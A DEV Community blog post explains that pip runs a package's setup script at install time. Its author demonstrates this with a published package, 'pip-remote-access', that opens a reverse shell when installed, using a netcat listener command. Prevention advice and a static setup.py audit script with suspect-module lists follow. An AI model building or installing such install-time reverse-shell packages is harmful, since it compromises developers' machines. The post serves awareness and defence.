DEV Community

Ansari

Hacking and Getting Remote Access with PIP

RCE with pip? Yes, you read that right.

First, before getting our hands dirty, let's see what pip is.
Most Python developers obviously know what pip is.
For other developers, pip is the package installer for Python. You can use pip to install packages from the Python Package Index and other indexes. It is to Python what npm, apt or Homebrew (or whatever other package manager you can name) is to its own ecosystem.

How does it work

Let's assume you want to send an HTTP request from Python. You could use the famous package named requests.
To get the requests package on your computer, you use the command:

    pip install requests

That's it.
This installs the package, and you can then use it by importing it.

So how does pip install work? Simple: it gets the source code from the server, executes the package's setup script on your computer, and installs the requirements.

What if you write your own reverse shell package?

That's what I did: I wrote a package which allows the attacker to get the reverse shell of the victim.
I didn't want to make a global reverse shell thing, so I simply wrote the script to be executed locally on the machine.

Here's the demo video, check it out: Link
The package is available: Link

  1. First, listen on port 1234 with nc: nc -lvp 1234
  2. Now install the package: pip install pip-remote-access

Now the listener will get the reverse shell.

How to prevent this?

This module is meant to raise awareness among developers. When installing a package, verify that it comes from a legitimate, verified publisher.
PyPI.org doesn't check whether the GitHub page really belongs to the package's developer. It just takes whatever GitHub link the developer gives and displays the stars and forks from it.
So it is better to go to the package's GitHub page and check it; this way you also get to know the code.
Install the package in binary-only mode; it will be much safer.
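
One way to do the code check described above without running anything, as an added example that is not part of the original post: the script parses a source distribution's setup.py with Python's ast module and reports install-time red flags. The module and call lists, the function names and the demo-pkg sample are constructed assumptions for illustration.

```python
import ast, io, tarfile

# Heuristic lists (assumptions, tune to taste): things a build script rarely needs.
SUSPECT_MODULES = {"socket", "subprocess", "pty", "ctypes", "urllib", "http", "requests", "base64"}
SUSPECT_CALLS = {"os.system", "os.popen", "exec", "eval", "__import__"}

def audit_setup_source(source):
    """Statically inspect setup.py text: it is parsed, never imported or executed."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        names = [a.name for a in node.names] if isinstance(node, ast.Import) else []
        if isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        findings += [(node.lineno, f"imports {n}") for n in names if n.split(".")[0] in SUSPECT_MODULES]
        if isinstance(node, ast.Call):
            called = ast.unparse(node.func)  # dotted name of the callee (Python 3.9+)
            if called in SUSPECT_CALLS or called.split(".")[0] in SUSPECT_MODULES:
                findings.append((node.lineno, f"calls {called}()"))
            if any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append((node.lineno, "passes cmdclass (custom install command)"))
    return sorted(findings)

def audit_sdist(archive):
    """Audit the top-level setup.py of a .tar.gz sdist held in memory; nothing is unpacked."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        for member in tar:
            if member.isfile() and member.name.count("/") == 1 and member.name.endswith("/setup.py"):
                return audit_setup_source(tar.extractfile(member).read().decode("utf-8"))
    return []  # no top-level setup.py in the archive

# Constructed sample: a harmless setup.py that runs a command at install time.
SAMPLE_SETUP = '''\
import subprocess
from setuptools import setup
from setuptools.command.install import install
class PostInstall(install):
    def run(self):
        install.run(self)
        subprocess.call(["echo", "ran at install time"])
setup(name="demo-pkg", version="0.1", cmdclass={"install": PostInstall})
'''

def build_sample_sdist():
    buf, data = io.BytesIO(), SAMPLE_SETUP.encode()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("demo-pkg-0.1/setup.py")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()
```

Call `audit_sdist(open(path, "rb").read())` on an archive you fetched yourself; a clean result is a prompt to read the code, not proof that it is safe. pip's `--only-binary :all:` option is the binary-only mode mentioned above: it refuses source distributions, so no setup.py runs during install.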
